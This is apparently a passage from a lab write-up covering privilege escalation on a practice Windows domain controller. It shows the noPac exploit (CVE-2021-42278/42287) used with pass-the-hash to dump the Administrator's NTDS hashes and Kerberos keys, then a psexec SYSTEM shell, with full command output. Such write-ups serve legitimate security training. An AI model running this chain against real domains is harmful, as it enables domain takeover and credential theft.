Priv Esc

$ netexec smb 192.168.170.175 -u L.Livingstone -H 19a3a7550ce8c505c2d46b5e39d6f808 -M nopac
SMB         192.168.170.175 445    RESOURCEDC       [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:False)
SMB         192.168.170.175 445    RESOURCEDC       [+] resourced.local\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808 
NOPAC       192.168.170.175 445    RESOURCEDC       TGT with PAC size 1450
NOPAC       192.168.170.175 445    RESOURCEDC       TGT without PAC size 653
NOPAC       192.168.170.175 445    RESOURCEDC       
NOPAC       192.168.170.175 445    RESOURCEDC       VULNERABLE
NOPAC       192.168.170.175 445    RESOURCEDC       Next step: https://github.com/Ridter/noPac

GitHub - Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain userGitHub

$ echo 192.168.170.175 RESOURCEDC resourced.local RESOURCEDC.resourced.local | sudo tee -a /etc/hosts
192.168.170.175 RESOURCEDC resourced.local RESOURCEDC.resourced.local

$ python noPac.py resourced.local/L.Livingstone -hashes :19a3a7550ce8c505c2d46b5e39d6f808 -dc-ip 192.168.170.175 -dc-host RESOURCEDC --impersonate Administrator -dump -just-dc-user Administrator -use-ldap

███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
    
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target RESOURCEDC.resourced.local
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-LKSXTEHHJQ3$"
[*] MachineAccount "WIN-LKSXTEHHJQ3$" password = FuKyJY@u0fZW
[*] Successfully added machine account WIN-LKSXTEHHJQ3$ with password FuKyJY@u0fZW.
[*] WIN-LKSXTEHHJQ3$ object = CN=WIN-LKSXTEHHJQ3,CN=Computers,DC=resourced,DC=local
[*] WIN-LKSXTEHHJQ3$ sAMAccountName == RESOURCEDC
[*] Saving a DC's ticket in RESOURCEDC.ccache
[*] Reseting the machine account to WIN-LKSXTEHHJQ3$
[*] Restored WIN-LKSXTEHHJQ3$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] 	Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_RESOURCEDC.resourced.local.ccache
[*] Attempting to del a computer with the name: WIN-LKSXTEHHJQ3$
[-] Delete computer WIN-LKSXTEHHJQ3$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8e0efd059433841f73d171c69afdda7c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:8b390f83fedcfa8a5275a4a80ab1200da3c6420a502eec668fc3a23d3d8cfba5
Administrator:aes128-cts-hmac-sha1-96:efa1aa29ae0536b35a2534f0abd881a3
Administrator:des-cbc-md5:0de34cf7bf32898f
[*] Cleaning up...

Administrator:8e0efd059433841f73d171c69afdda7c

$ netexec smb 192.168.170.175 -u Administrator -H 8e0efd059433841f73d171c69afdda7c         
SMB         192.168.170.175 445    RESOURCEDC       [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:False)
SMB         192.168.170.175 445    RESOURCEDC       [+] resourced.local\Administrator:8e0efd059433841f73d171c69afdda7c (Pwn3d!)

$ impacket-psexec resourced.local/[email protected] -hashes :8e0efd059433841f73d171c69afdda7c
Impacket v0.12.0.dev1+20240807.21946.829239e - Copyright 2023 Fortra

[*] Requesting shares on 192.168.170.175.....
[*] Found writable share ADMIN$
[*] Uploading file oWGowvHH.exe
[*] Opening SVCManager on 192.168.170.175.....
[*] Creating service RERK on 192.168.170.175.....
[*] Starting service RERK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2145]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> hostname && whoami.exe && type C:\Users\Administrator\Desktop\proof.txt && ipconfig
ResourceDC
nt authority\system
54564fec8409f1ef939bc1292ab5192d

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.170.175
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.170.254

PreviousEnumeration NextCredentials / Notes / LL

Last updated 1 year ago